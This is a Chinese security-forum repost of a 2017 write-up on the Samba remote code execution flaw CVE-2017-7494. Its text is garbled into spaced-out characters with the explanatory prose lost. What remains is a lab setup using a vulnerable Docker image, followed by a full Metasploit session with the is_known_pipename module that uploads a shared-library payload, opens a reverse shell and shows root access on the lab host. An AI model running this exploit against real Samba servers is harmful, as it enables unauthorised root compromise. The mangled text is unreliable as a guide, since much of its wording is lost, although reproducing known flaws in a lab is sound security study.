搜索

[19044] 2017-05-25_Samba远程代码执行漏洞(CVE-2017-7494)附环境

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-18
2017-05-25_Samba远程代码执行漏洞(CVE-2017-7494)附环境 S a m b a ( C V E - 2 0 1 7 - 7 4 9 4 )       i n n 0 t e a m   2 0 1 7 - 0 5 - 2 5 i n n 0 t e a m   i n n 0 t e a m   2 0 1 7 5 2 4 S a m b a 4 . 6 . 4 C V E - 2 0 1 7 - 7 4 9 4 S a m b a   3 . 5 . 0   4 . 6 . 4 / 4 . 5 . 1 0 / 4 . 4 . 1 4 R e m o t e   c o d e   e x e c u t i o n   f r o m   a   w r i t a b l e   s h a r e . h t t p s : / / w w w . s a m b a . o r g / s a m b a / s e c u r i t y / C V E - 2 0 1 7 - 7 4 9 4 . h t m l : 1 .   1 .       4 4 5     I P     1 9 2 . 1 6 8 . 3 5 . 1 9 7 $   d o c k e r   p u l l   m e d i c e a n / v u l a p p s : s _ s a m b a _ 1   $   d o c k e r   r u n   - d   - p   4 4 5 : 4 4 5   - p   1 3 9 : 1 3 9   - p   1 3 8 : 1 3 8   - p   1 3 7 : 1 3 7   m e d i c e a n / v u l a p p s : s _ s a m b a _ 1 - p   4 4 5 : 4 4 5
1 .   2 .   3 .   4 .   5 .   6 .   7 .   8 .   9 .   1 0 .   1 1 .   1 2 .   1 3 .   1 4 .   1 5 .   1 6 .   1 7 .   1 8 .   1 9 .   2 0 .   2 1 .   2 2 .   2 3 .   2 4 .   2 5 .   2 6 .   2 7 .   2 8 .   2 9 .   3 0 .   3 1 .   3 2 .   3 3 .   3 4 .   3 5 .   3 6 .   3 7 .   3 8 .   3 9 .   4 0 .   4 1 .     s m b . c o n f       ,   1 .   2 .   h t t p s : / / g i t h u b . c o m / r a p i d 7 / m e t a s p l o i t - f r a m e w o r k / p u l l / 8 4 5 0 h t t p : / / b l o g s . 3 6 0 . c n / b l o g / s a m b a % E 8 % B F % 9 C % E 7 % A 8 % 8 B % E 4 % B B % A 3 % E 7 % A 0 % 8 1 % E 6 % 8 9 % A 7 % E 8 % A 1 % 8 C % E 6 % B C % 8 F % E 6 % B 4 % 9 E c v e - 2 0 1 7 - 7 4 9 4 % E 5 % 8 8 % 8 6 % E 6 % 9 E % 9 0 / i n n 0 t e a m     i n n 0 t e a m m s f   >   u s e   e x p l o i t / l i n u x / s a m b a / i s _ k n o w n _ p i p e n a m e m s f   e x p l o i t ( i s _ k n o w n _ p i p e n a m e )   >   s e t   R H O S T   1 9 2 . 1 6 8 . 3 5 . 1 9 7 R H O S T   = >   1 9 2 . 1 6 8 . 3 5 . 1 9 7 m s f   e x p l o i t ( i s _ k n o w n _ p i p e n a m e )   >   s h o w   o p t i o n s M o d u l e   o p t i o n s   ( e x p l o i t / l i n u x / s a m b a / i s _ k n o w n _ p i p e n a m e ) :       N a m e                         C u r r e n t   S e t t i n g     R e q u i r e d     D e s c r i p t i o n       - - - -                         - - - - - - - - - - - - - - -     - - - - - - - -     - - - - - - - - - - -       R H O S T                       1 9 2 . 1 6 8 . 3 5 . 1 9 7       y e s               T h e   t a r g e t   a d d r e s s       R P O R T                       4 4 5                             y e s               T h e   S M B   s e r v i c e   p o r t   ( T C P )       S M B _ F O L D E R                                               n o                 T h e   d i r e c t o r y   t o   u s e   w i t h i n   t h e   w r i t e a b l e   S M B   s h a r e       S M B _ S H A R E _ B A S E                                       n o                 T h e   r e m o t e   f i l e s y s t e m   p a t h   c o r r e l a t i n g   w i t h   t h e   S M B   s h a r e   n a m e       S M B _ S H A R E _ N A M E                                       n o                 T h e   n a m e   o f   t h e   S M B   s h a r e   c o n t a i n i n g   a   w r i t e a b l e   d i r e c t o r y E x p l o i t   t a r g e t :       I d     N a m e       - -     - - - -       2       L i n u x   x 8 6 _ 6 4 m s f   e x p l o i t ( i s _ k n o w n _ p i p e n a m e )   >   r u n [ * ]   S t a r t e d   r e v e r s e   T C P   h a n d l e r   o n   1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 4 4 4 4 [ * ]   1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 4 4 5   -   U s i n g   l o c a t i o n   1 9 2 . 1 6 8 . 3 5 . 1 9 7 s h a r e   f o r   t h e   p a t h [ * ]   1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 4 4 5   -   P a y l o a d   i s   s t o r e d   i n   / / 1 9 2 . 1 6 8 . 3 5 . 1 9 7 / s h a r e /   a s   d D U J i i u f . s o [ * ]   1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 4 4 5   -   T r y i n g   l o c a t i o n   / v o l u m e 1 / d D U J i i u f . s o . . . [ * ]   1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 4 4 5   -   T r y i n g   l o c a t i o n   / v o l u m e 1 / s h a r e / d D U J i i u f . s o . . . [ * ]   1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 4 4 5   -   T r y i n g   l o c a t i o n   / v o l u m e 1 / S h a r e / d D U J i i u f . s o . . . [ * ]   1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 4 4 5   -   T r y i n g   l o c a t i o n   / m n t / m e d i a / S H A R E / d D U J i i u f . s o . . . [ * ]   1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 4 4 5   -   T r y i n g   l o c a t i o n   / m n t / m e d i a / S h a r e / d D U J i i u f . s o . . . [ * ]   1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 4 4 5   -   T r y i n g   l o c a t i o n   / v a r / s a m b a / s h a r e / d D U J i i u f . s o . . . [ * ]   1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 4 4 5   -   T r y i n g   l o c a t i o n   / v a r / s a m b a / S H A R E / d D U J i i u f . s o . . . [ * ]   1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 4 4 5   -   T r y i n g   l o c a t i o n   / v a r / s a m b a / S h a r e / d D U J i i u f . s o . . . [ * ]   1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 4 4 5   -   T r y i n g   l o c a t i o n   / t m p / d D U J i i u f . s o . . . [ * ]   C o m m a n d   s h e l l   s e s s i o n   1   o p e n e d   ( 1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 4 4 4 4   - >   1 9 2 . 1 6 8 . 3 5 . 1 9 7 : 5 8 0 8 9 )   a t   2 0 1 7 - 0 5 - 2 5   1 3 : 2 6 : 1 9   + 0 8 0 0 i d u i d = 6 5 5 3 4 ( n o b o d y )   g i d = 0 ( r o o t )   g r o u p s = 0 ( r o o t ) , 6 5 5 3 4 ( n o g r o u p ) g u e s t   a c c o u n t   =   r o o t i d u i d = 0 ( r o o t )   g i d = 0 ( r o o t )   g r o u p s = 0 ( r o o t )

回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理